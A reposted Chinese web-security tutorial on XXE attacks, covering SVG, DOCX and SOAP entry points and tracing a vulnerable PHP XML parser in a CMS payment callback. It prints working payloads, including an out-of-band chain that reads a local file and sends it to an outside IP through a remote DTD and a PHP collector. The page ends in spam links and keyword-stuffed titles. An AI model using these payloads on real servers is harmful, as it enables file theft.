当前位置: 首页 > wzjs >正文

网站空间要多大别人买我的域名做违法事

网站空间要多大,别人买我的域名做违法事,全球速卖通买家版,163企业邮箱免费注册知识点&#xff1a; 1、WEB攻防-XML&XXE-黑盒功能点挖掘 2、WEB攻防-XML&XXE-白盒函数点挖掘 3、WEB攻防-XML&XXE-SRC报告 一、演示案例-WEB攻防-XML&XXE-黑盒功能点挖掘 1、不安全的图像读取-SVG <?xml version"1.0" standalone"yes&qu…

知识点:
1、WEB攻防-XML&XXE-黑盒功能点挖掘
2、WEB攻防-XML&XXE-白盒函数点挖掘
3、WEB攻防-XML&XXE-SRC报告

一、演示案例-WEB攻防-XML&XXE-黑盒功能点挖掘

1、不安全的图像读取-SVG

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://dnslog.cn" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text>
</svg>

在这里插入图片描述
在这里插入图片描述

2、不安全的文档转换-DOCX

参考地址:https://blog.csdn.net/weixin_57567655/article/details/124588490
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
也可以使用工具直接生成:https://github.com/whitel1st/docem

3、不安全的传递服务-SOAP

在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB攻防-XML&XXE-白盒函数点挖掘

1、漏洞函数simplexml_load_string

在这里插入图片描述

2、pe_getxml函数调用了漏洞函数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、wechat_getxml调用了pe_getxml

在这里插入图片描述
在这里插入图片描述

4、notify_url调用了wechat_getxml

在这里插入图片描述
在这里插入图片描述

5、访问notify_url文件触发wechat_getxml函数,构造Paylod测试。

在这里插入图片描述

先尝试读取文件,无回显后带外测试:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">
%file;
]>
<root>&send;</root>

在这里插入图片描述
在这里插入图片描述

然后带外传递数据解决无回显:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">get.php:
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

三、演示案例-WEB攻防-XML&XXE-SRC报告

https://xz.aliyun.com/news/16463
https://mp.weixin.qq.com/s/biQgwMU2v1I92CsDOFRB7g
https://mp.weixin.qq.com/s/1pj9sbwKT6RjIiLgNC7-Gg
https://mp.weixin.qq.com/s/Mgd91_Iie-wZU7MqP5oCXw


文章转载自:

http://oa862DS0.Ljsxg.cn
http://x4bet5CO.Ljsxg.cn
http://6P6A7pJV.Ljsxg.cn
http://Hhgsbcks.Ljsxg.cn
http://4twbm7GI.Ljsxg.cn
http://0oYWoQVd.Ljsxg.cn
http://RBwQ6UrK.Ljsxg.cn
http://fkbaYizo.Ljsxg.cn
http://ywPXi7Xf.Ljsxg.cn
http://4ksKazis.Ljsxg.cn
http://AEh5y5eh.Ljsxg.cn
http://iLfuKMc8.Ljsxg.cn
http://YXQPazw8.Ljsxg.cn
http://ydFWwFYx.Ljsxg.cn
http://70wPRF8s.Ljsxg.cn
http://bgllol1T.Ljsxg.cn
http://seiel0Ws.Ljsxg.cn
http://5z0Nd1yW.Ljsxg.cn
http://SnRuYIPk.Ljsxg.cn
http://596SnBh0.Ljsxg.cn
http://wD7wIwPw.Ljsxg.cn
http://jq3cJRQQ.Ljsxg.cn
http://msfjoGbI.Ljsxg.cn
http://dJi3oyOf.Ljsxg.cn
http://OZ8BAJrd.Ljsxg.cn
http://T3tdiI8y.Ljsxg.cn
http://BQJj8FKT.Ljsxg.cn
http://ZgYySq3G.Ljsxg.cn
http://VB7RssKO.Ljsxg.cn
http://D0j3UlYU.Ljsxg.cn
http://www.dtcms.com/wzjs/609837.html

相关文章:

  • 国外论文类网站有哪些方面网站最下面版权模板
  • 网站建设百度索引禁止国内ip访问 网站
  • 网站建设合同 程序wordpress iis
  • 深圳网站建设 公司元阿里巴巴黄页网站
  • 手机网站分辨率做多大赔率网站怎么做
  • 少年宫网站建设模块西安学校网站建设多少钱
  • wordpress公司网站插件安卓aso优化排名
  • 微信关联网站图书馆网站信息化建设
  • 旅游网站色彩搭配网站改版需求
  • 音乐网站禁止做浅度链接wordpress 图片编辑
  • 网站上传的流程图建设厅网站查询电工证件
  • 三个年轻人做电影网站800万网站app免费制作软件
  • 网站建设教程.小程序定制程序
  • 建设企业网站流程wordpress后台密码默认
  • 网站引导插件免费家政网站建设
  • 做网站要分几部分完成国际新闻最新消息10条
  • 做平台的网站有哪些内容吗免费推广网站都有哪些
  • wordpress视频站模板下载同一个服务器的网站做友情链接
  • app网站开发长沙海南省建设人力资源网站
  • 万户网站网站海外推广外包
  • cms做网站容易不网站做备案
  • 自然人做音频网站违法吗怎么免费弄网站
  • 用vue.js做网站的好处一键识图找原图
  • 哪一家做网站好重庆网站开发培训
  • 网格系统网站无锡网站排名系统
  • jsp怎样做网站电商数据查询平台
  • 免费的网站后台管理系统陕西省建筑信息平台
  • 如何设计制作企业网站开公司如何做网站推广
  • 新乡做网站费用商城源码哪个品牌好
  • 安庆网站建设aqwzjs郑州餐饮网站建设公司